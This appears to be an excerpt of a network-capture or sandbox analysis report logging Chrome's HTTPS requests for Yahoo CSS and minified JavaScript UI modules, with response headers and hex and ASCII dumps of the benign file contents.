                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC728INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: GUdeMEXHFnChSF/4Tb/AaM6T5VZcMFfMdnHO33nhvde4VPoHmcNz/nqkddaoce/XJ7ws3Ff+/qQ=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: EKDH9NB2RW9YW5KD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Sun, 22 Sep 2024 11:27:30 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Mon, 18 Dec 2023 23:21:02 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "cdd5050ba6288df47182412e30e482a4"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-version-id: W6wjlexzsuoIk3RVZ4XUZ6EnDTuHcXns
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 175
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 712416
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC175INData Raw: 2e 67 61 6d 65 73 2d 74 61 62 73 2d 73 63 72 6f 6c 6c 76 69 65 77 20 2e 70 72 65 76 2d 62 74 6e 5b 64 69 73 61 62 6c 65 64 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 23 61 74 6f 6d 69 63 20 2e 67 61 6d 65 73 2d 74 61 62 73 3e 62 75 74 74 6f 6e 3a 6c 61 73 74 2d 63 68 69 6c 64 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 31 30 70 78 7d 2e 67 61 6d 65 73 2d 74 61 62 73 2d 73 63 72 6f 6c 6c 76 69 65 77 20 2e 73 6c 69 64 65 73 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: .games-tabs-scrollview .prev-btn[disabled]{display:none}#atomic .games-tabs>button:last-child{margin-right:10px}.games-tabs-scrollview .slides::-webkit-scrollbar{display:none}


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    147192.168.2.44990887.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:04 UTC365OUTGET /aaq/wf/wf-benji-1.2.0-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC743INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: I8gJVUDS2Trw8qBcZpgzsLq7qsBkgSKWunHy/4GlZr9c060JRjlbDgCkZFxiFckLsJAbjQ1Y408=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: H2ACKMRMZVMTE79T
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Fri, 27 Sep 2024 11:47:29 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Mon, 20 May 2024 21:26:01 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "11cf4f9bff98fc79f8eecf2894832023"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-version-id: tIzwVm575mAKu9xUI7zQ09wGt6PpRi8K
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 8353
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 279217
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 62 65 6e 6a 69 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 62 65 6e 6a 69 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 7c 7c 7b 7d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-benji",[],t):"object"==typeof exports?exports["wafer-benji"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC1300INData Raw: 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 2c 74 29 3a 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 74 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 74 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 63 61 6c 6c 20 61 20 63 6c 61 73 73 20 61 73 20 61 20 66
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: totype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}function a(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC1300INData Raw: 29 3b 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 49 6e 76 61 6c 69 64 20 61 74 74 65 6d 70 74 20 74 6f 20 64 65 73 74 72 75 63 74 75 72 65 20 6e 6f 6e 2d 69 74 65 72 61 62 6c 65 20 69 6e 73 74 61 6e 63 65 22 29 7d 7d 28 29 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 72 3d 74 5b 6e 5d 3b 72 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 72 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 72 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 72 26 26 28 72 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 72 2e 6b 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: );throw new TypeError("Invalid attempt to destructure non-iterable instance")}}(),l=function(){function e(e,t){for(var n=0;n<t.length;n++){var r=t[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(e,r.ke
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC1300INData Raw: 74 68 69 73 2e 5f 75 74 69 6c 3b 72 65 74 75 72 6e 7b 6f 66 66 73 65 74 58 3a 65 2e 6f 66 66 73 65 74 58 2c 6f 66 66 73 65 74 59 3a 65 2e 6f 66 66 73 65 74 59 2c 74 72 69 67 67 65 72 3a 65 2e 74 72 69 67 67 65 72 7d 7d 7d 5d 29 2c 74 7d 28 76 29 3b 77 2e 65 76 65 6e 74 73 3d 7b 7d 3b 76 61 72 20 6a 3d 77 2c 6d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 72 3d 74 5b 6e 5d 3b 72 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 72 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 72 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 72 26 26 28 72 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: this._util;return{offsetX:e.offsetX,offsetY:e.offsetY,trigger:e.trigger}}}]),t}(v);w.events={};var j=w,m=function(){function e(e,t){for(var n=0;n<t.length;n++){var r=t[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC1300INData Raw: 69 65 77 70 6f 72 74 22 3d 3d 3d 6f 26 26 28 69 3d 6b 28 65 2c 7b 6f 66 66 73 65 74 58 3a 2d 31 2a 6e 2c 6f 66 66 73 65 74 59 3a 2d 31 2a 72 7d 2c 43 2e 76 69 65 77 70 6f 72 74 29 29 2c 69 26 26 76 2e 74 72 69 67 67 65 72 46 6f 72 45 6c 65 6d 65 6e 74 73 28 5b 65 5d 2c 7b 73 6f 75 72 63 65 3a 22 73 74 61 74 65 22 7d 29 7d 2c 62 2e 73 79 6e 63 28 29 2c 62 7d 72 65 74 75 72 6e 20 66 28 74 2c 65 29 2c 6d 28 74 2c 5b 7b 6b 65 79 3a 22 5f 63 68 65 63 6b 49 66 42 65 6e 6a 69 4e 61 6d 65 53 70 61 63 65 45 78 69 73 74 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2c 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3f 61 72 67 75 6d 65 6e 74 73
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: iewport"===o&&(i=k(e,{offsetX:-1*n,offsetY:-1*r},C.viewport)),i&&v.triggerForElements([e],{source:"state"})},b.sync(),b}return f(t,e),m(t,[{key:"_checkIfBenjiNameSpaceExist",value:function(){var e=this,t=arguments.length>0&&void 0!==arguments[0]?arguments
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC1300INData Raw: 72 43 6c 61 73 73 29 2c 43 2e 65 6d 69 74 57 61 66 65 72 45 76 65 6e 74 28 22 62 65 6e 6a 69 3a 65 72 72 6f 72 22 2c 7b 65 6c 65 6d 3a 6e 2c 6d 65 74 61 3a 7b 64 61 74 61 3a 65 2c 69 64 3a 74 7d 7d 29 7d 7d 7d 2c 7b 6b 65 79 3a 22 6c 69 73 74 65 6e 54 6f 42 65 6e 6a 69 45 76 65 6e 74 73 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 5f 73 74 61 74 65 3b 69 66 28 21 65 2e 61 64 64 65 64 4c 69 73 74 65 6e 65 72 46 6f 72 62 65 6e 6a 69 45 76 65 6e 74 73 29 7b 65 2e 61 64 64 65 64 4c 69 73 74 65 6e 65 72 46 6f 72 62 65 6e 6a 69 45 76 65 6e 74 73 3d 21 30 3b 76 61 72 20 74 3d 77 69 6e 64 6f 77 2e 62 65 6e 6a 69 3b 74 2e 6f 6e 28 22 52 45 4e 44 45 52 5f 53 55 43 43 45 45 44 45 44 22 2c 74 68 69 73 2e 68 61 6e 64 6c 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: rClass),C.emitWaferEvent("benji:error",{elem:n,meta:{data:e,id:t}})}}},{key:"listenToBenjiEvents",value:function(){var e=this._state;if(!e.addedListenerForbenjiEvents){e.addedListenerForbenjiEvents=!0;var t=window.benji;t.on("RENDER_SUCCEEDED",this.handle
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC553INData Raw: 65 79 3a 22 68 61 6e 64 6c 65 52 65 73 69 7a 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 76 61 6c 69 64 61 74 65 57 69 74 68 44 65 62 6f 75 6e 63 65 28 29 7d 7d 2c 7b 6b 65 79 3a 22 77 69 6c 6c 56 61 6c 69 64 61 74 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 5b 5d 2c 6e 3d 74 68 69 73 2e 5f 73 74 61 74 65 2e 65 6c 65 6d 65 6e 74 49 6e 73 74 61 6e 63 65 73 3b 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 3d 6e 2e 67 65 74 28 65 29 2c 6f 3d 72 2e 69 6e 73 74 61 6e 63 65 2c 69 3d 6f 2e 63 6f 6e 66 69 67 2c 61 3d 69 2e 6f 66 66 73 65 74 58 2c 73 3d 69 2e 6f 66 66 73 65 74 59 2c 66 3d 69 2e 74 72 69 67 67 65 72 3b 22 76 69 65 77 70 6f 72 74 22 3d 3d 3d 66
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ey:"handleResize",value:function(){this._validateWithDebounce()}},{key:"willValidate",value:function(e){var t=[],n=this._state.elementInstances;e.forEach(function(e){var r=n.get(e),o=r.instance,i=o.config,a=i.offsetX,s=i.offsetY,f=i.trigger;"viewport"===f


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    148192.168.2.44990787.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:04 UTC369OUTGET /aaq/wf/wf-countdown-1.2.5-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC744INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: Z5qzEDcOhg7YdwPismqUntbKPuzprzPp0cw1f65/eI2jMA/1Jtbtk8+BHLIIx6js5so+P0BE0ow=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: S0YY22HS9WB9D1MG
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Thu, 26 Sep 2024 07:34:04 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Sun, 13 Sep 2020 18:50:05 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "681d57e9e7cbef5de44544c13f8ca62e"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public,max-age=315360000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-version-id: CQ1lP8549yVnp28g4QLu9GcN8rB3ImgO
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 4348
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 380822
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 63 6f 75 6e 74 64 6f 77 6e 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 63 6f 75 6e 74 64 6f 77 6e 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 65 2e 77 61 66 65 72 2e 77 61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-countdown",[],t):"object"==typeof exports?exports["wafer-countdown"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wa
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC1300INData Raw: 74 26 26 6e 75 6c 6c 21 3d 3d 74 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 2c 20 6e 6f 74 20 22 2b 74 79 70 65 6f 66 20 74 29 3b 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: t&&null!==t)throw new TypeError("Super expression must either be null or a function, not "+typeof t);e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeO
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC1300INData Raw: 65 78 65 63 28 6e 29 2c 73 3d 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 61 29 26 26 61 5b 31 5d 3b 73 26 26 28 6e 3d 73 29 7d 69 66 28 6e 29 7b 76 61 72 20 75 3d 6c 28 6e 29 2c 69 3d 6e 65 77 20 4d 61 70 3b 75 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 2e 73 65 74 28 65 2c 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 22 77 61 66 65 72 2d 63 6f 75 6e 74 64 6f 77 6e 2d 22 2b 65 29 5b 30 5d 29 7d 29 3b 76 61 72 20 66 3d 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 77 66 2d 63 6f 75 6e 74 64 6f 77 6e 2d 65 6e 64 64 61 74 65 22 29 3b 66 26 26 69 2e 73 69 7a 65 3d 3d 3d 75 2e 6c 65 6e 67 74 68 26 26 74 68 69 73 2e 73 65 74 75 70 43 6f 75 6e 74 28 69 2c 66 2c 6f 29 7d 7d 72 65 74 75 72 6e 20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: exec(n),s=Array.isArray(a)&&a[1];s&&(n=s)}if(n){var u=l(n),i=new Map;u.forEach(function(e){i.set(e,t.getElementsByClassName("wafer-countdown-"+e)[0])});var f=t.getAttribute("data-wf-countdown-enddate");f&&i.size===u.length&&this.setupCount(i,f,o)}}return
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC448INData Raw: 74 54 69 6d 65 49 6e 74 65 72 76 61 6c 29 7d 7d 5d 29 2c 65 7d 28 29 2c 70 3d 77 2c 68 3d 77 69 6e 64 6f 77 2e 77 61 66 65 72 2e 63 6f 6e 74 72 6f 6c 6c 65 72 73 2e 57 61 66 65 72 42 61 73 65 43 6f 6e 74 72 6f 6c 6c 65 72 2c 79 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 29 7b 76 61 72 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 7b 7d 2c 6e 3d 65 2e 72 6f 6f 74 2c 72 3d 76 6f 69 64 20 30 3d 3d 3d 6e 3f 64 6f 63 75 6d 65 6e 74 3a 6e 2c 73 3d 65 2e 73 65 6c 65 63 74 6f 72 2c 75 3d 76 6f 69 64 20 30 3d 3d 3d 73 3f 22 2e 77 61 66 65 72 2d 63 6f 75 6e 74 64 6f 77 6e 22 3a 73 3b 6f 28 74 68 69 73 2c 74 29
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: tTimeInterval)}}]),e}(),p=w,h=window.wafer.controllers.WaferBaseController,y=function(e){function t(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:{},n=e.root,r=void 0===n?document:n,s=e.selector,u=void 0===s?".wafer-countdown":s;o(this,t)


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    149192.168.2.44991787.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
